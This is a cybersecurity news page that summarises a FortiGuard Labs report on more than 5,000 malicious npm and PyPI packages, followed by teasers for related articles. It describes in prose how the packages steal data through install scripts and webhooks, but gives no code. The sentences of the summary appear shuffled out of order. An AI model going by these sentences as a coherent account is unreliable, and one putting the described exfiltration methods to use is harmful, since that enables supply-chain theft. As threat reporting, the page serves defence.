5000+ Malicious Packages Found In The Wild To Compromise Windows Systems

These packages, detected from November 2024 onward, employ sophisticated techniques to evade traditional security measures while executing harmful actions that can lead to data theft, unauthorized access, and complete system compromise. Similarly, malicious Node.js packages like seller-admin-common_6.5.8 and seller-rn-mng-lib_6.5.8 contain code that harvests sensitive information including internal and external IP addresses, DNS servers, and user details, bundling this data into JSON objects before transmitting it to attackers via Discord webhooks. These malicious packages pose substantial threats to Windows systems, with capabilities ranging from keylogging and data exfiltration to establishing backdoors and executing remote commands. FortiGuard Labs recommends that developers install packages only from trusted sources, review package content before installation, use isolated virtual environments, employ security scanning tools, and maintain up-to-date dependencies. Another 1,052 packages contained suspicious install scripts designed to silently deploy malicious code during the installation process, often modifying standard procedures to execute harmful actions without user awareness. Further analysis by Fortinet researchers revealed 681 packages utilizing suspicious APIs, including commands such as https.get and https.request, primarily used to exfiltrate sensitive data or establish remote control capabilities. The analysis reveals a disturbing trend in the evolution of cyber threats, with attackers continuously refining their methods to bypass security protocols and infiltrate systems undetected. Packages such as AffineQuant-99.6, amzn-aws-glue-ml-libs-python-6.1.5, and amzn-awsglue-6.1.4 were found to gather MAC addresses, hostnames, usernames, and directory information before transmitting this data to attacker-controlled servers. FortiGuard Labs has recently uncovered more than 5,000 malicious software packages designed to compromise Windows systems. The study also identified 537 packages with empty descriptions, a technique that further obscures malicious intent, and 164 packages with unusually high version numbers, used to mislead users into trusting outdated or potentially harmful software. One particularly concerning attack vector involves Python packages that exploit the setup.py file to silently collect system information. The code not only logs keystrokes but also establishes a backdoor with elevated privileges, providing attackers complete system control while collecting operating system details, installed applications, and network configurations. Additionally, 1,043 packages lacked repository URLs, raising significant concerns about their legitimacy and traceability, while 974 packages included suspicious URLs that potentially facilitate communication with command-and-control servers. The investigation identified 1,082 packages with low file counts, a tactic employed to minimize detection footprint while maximizing damage potential. The script employs different system commands depending on the operating system (getmac for Windows, ifconfig for Linux/macOS) and encodes the stolen information using base64 before exfiltration.

This Cyber News was published on cybersecuritynews.com. Publication date: Tue, 11 Mar 2025 11:50:07 +0000


Cyber News related to 5000+ Malicious Packages Found In The Wild To Compromise Windows Systems

5000+ Malicious Packages Found In The Wild To Compromise Windows Systems - These packages, detected from November 2024 onward, employ sophisticated techniques to evade traditional security measures while executing harmful actions that can lead to data theft, unauthorized access, and complete system compromise. Similarly, ...
6 months ago Cybersecuritynews.com
Malicious PyPI packages targeting highly specific MacOS machines - As part of our software package supply chain security efforts, we continuously scan for malware in newly released PyPI and NPM packages. In this post, we describe a particularly interesting cluster of malicious packages that we've identified. In late ...
1 year ago Securitylabs.datadoghq.com
3 PYPI Packages Caught Spreading Malware - Recent reports have highlighted the malicious spreading of malware via 3 specific Python Package Index (PyPI) packages. These 3 packages were identified and reported by Sonatype, a software supply chain security firm. ...
2 years ago Securityaffairs.com
Misconfiguration and vulnerabilities biggest risks in cloud security: Report - The two biggest cloud security risks continue to be misconfigurations and vulnerabilities, which are being introduced in greater numbers through software supply chains, according to a report by Sysdig. While zero trust is a top priority, data showed ...
2 years ago Csoonline.com Hunters
Arch Linux pulls AUR packages that installed Chaos RAT malware - Arch Linux has pulled three malicious packages uploaded to the Arch User Repository (AUR) were used to install the CHAOS remote access trojan (RAT) on Linux devices. The AUR is a repository where Arch Linux users can publish package build scripts ...
2 months ago Bleepingcomputer.com
116 Malicious PyPI Packages Downloaded Over 10,000 Times - A cluster of malicious Python projects has been identified in PyPI, the official Python PyPI package repository, which targets both Windows and Linux systems and often deploys a custom backdoor. In certain instances, the ultimate payload consists of ...
1 year ago Cybersecuritynews.com
Three New Malicious PyPI Packages Deploy CoinMiner on Linux Devices - Affected platforms: LinuxAffected parties: Linux users that have these malicious packages installedImpact: Latency in device performanceSeverity level: High. On December 5th, 2023, FortiGuard's AI-driven OSS malware detection system identified three ...
1 year ago Feeds.fortinet.com
Windows 10 Extended Security Updates Promised for Small Businesses and Home Users - Already common for enterprises, for the first time, individuals will also get the option to pay for extended security updates for a Windows operating system that's out of support. Windows 10 will stop getting free updates, including security fixes, ...
1 year ago Techrepublic.com
New Typosquatting and Repojacking Tactics Uncovered on PyPI - Security researchers have identified a concerning uptick in malicious activities infiltrating open-source platforms and code repositories. This trend encompasses a wide array of malicious activities, including hosting command-and-control ...
1 year ago Infosecurity-magazine.com
Malicious NPM, PyPI Packages Stealing User Information - Check Point and Phylum are warning of recently identified NPM and PyPI packages designed to steal user information and download additional payloads. Taking advantage of the broad use of open source code in application development, malicious actors ...
2 years ago Securityweek.com
Malicious PyPI packages abuse Gmail, websockets to hijack systems - Using a 'Client' class, the malware forwards traffic from the remote host to the local system through the tunnel, allowing internal admin panel and API access, file transfer, email exfiltration, shell command execution, credentials harvesting, and ...
5 months ago Bleepingcomputer.com Snatch
Hackers Injected Malicious Firefox Browser Packages to Arch Linux User Repository - Security researchers discovered that threat actors had uploaded three corrupted browser packages, firefox-patch-bin, librewolf-fix-bin, and zen-browser-patched-bin, to the Arch User Repository (AUR). A security advisory was issued, urging users to ...
2 months ago Cybersecuritynews.com
Malicious Python Packages Attacking Popular Cryptocurrency Library To Steal Sensitive Data - These packages, identified as bitcoinlibdbfix and bitcoinlib-dev, masquerade as legitimate fixes for the cryptocurrency library while containing code designed to exfiltrate sensitive database files containing valuable crypto wallet information. The ...
6 months ago Cybersecuritynews.com
Malicious NX Packages Found in S1ngularity Repository Targeting Developers - In August 2025, cybersecurity researchers uncovered a series of malicious NX packages hosted in the S1ngularity repository, posing a significant threat to developers and organizations relying on these packages. These malicious packages were designed ...
1 month ago Thehackernews.com
Malicious npm and PyPI Pose as Developer Tools to Steal Login Credentials - The researchers noted that the packages employ various exfiltration methods to transmit stolen credentials to threat actors, with react-native-scrollpageviewtest using Google Analytics as its exfiltration channel, while the PyPI packages leverage ...
5 months ago Cybersecuritynews.com
The Embedded Systems and The Internet of Things - The Internet of Things is a quite new concept dealing with the devices being connected to each other and communicating through the web environment. This concept is gaining its popularity amongst the embedded systems that exist - let's say - 10 or ...
1 year ago Cyberdefensemagazine.com
IT and OT cybersecurity: A holistic approach - In comparison, OT refers to the specialized systems that control physical processes and industrial operations. OT Technologies include industrial control systems, SCADA systems and programmable logic controllers that directly control physical ...
1 year ago Securityintelligence.com
Malicious NPM Packages Targeting PayPal Users to Steal Sensitive Data - FortiGuard Labs, Fortinet’s AI-driven threat intelligence arm, has uncovered a series of malicious NPM packages designed to steal sensitive information from developers and target PayPal users. Detected between March 5 and March 14, 2025, these ...
5 months ago Cybersecuritynews.com
'everything' blocks devs from removing their own npm packages - Since these 3,000+ packages manage to include every single npm package on the npmjs.com registry as their dependency, npm package authors who have ever published to the npm registry would now be unable to remove their packages at will, because of ...
1 year ago Bleepingcomputer.com
Lazarus Adds New Malicious npm Packages with Hexadecimal Encoding - These packages, part of the broader Contagious Interview operation, are designed to evade automated detection systems and manual code audits, marking a significant evolution in the group’s approach to cyber espionage and financial theft. The ...
6 months ago Cybersecuritynews.com Lazarus Group
Malicious npm Packages Attacking Linux Developers to Install SSH Backdoors - Discovered in early 2025, several malicious npm packages have been masquerading as legitimate Telegram bot libraries to deliver SSH backdoors and exfiltrate sensitive data from unsuspecting developers. The malicious variants—node-telegram-utils, ...
5 months ago Cybersecuritynews.com
Hackers breach Toptal GitHub account, publish malicious npm packages - In the days that followed, the attackers modified the source code of Picasso on GitHub to include malware and published 10 malicious packages on NPM as Toptal, making them appear as legitimate updates. According to code security ...
2 months ago Bleepingcomputer.com
Lazarus Hackers Weaponized 6 npm Packages To Steal Logins - The hackers successfully compromised six popular npm packages, injecting malicious code designed to harvest login credentials from thousands of developers and organizations worldwide. A sophisticated supply chain attack orchestrated by the notorious ...
6 months ago Cybersecuritynews.com Lazarus Group
Android malware and unwanted software statistics for Q1 2024 - Over 389,000 malicious installation packages were detected, of which: 11,729 packages were related to mobile banking Trojans, 1,990 packages were mobile ransomware Trojans. The rapid growth in the total number of attacks between Q2 and Q4 2023 is ...
1 year ago Securelist.com
DPython's Poisoned Package: Another 'Blank Grabber' Malware in PyPI - Python Package Index is a platform that offers an extensive range of packages to simplify and enhance the development process. Malicious actors regularly upload phishing packages in the platform's repository aimed at delivering malware to steal the ...
1 year ago Imperva.com

Cyber Trends (last 7 days)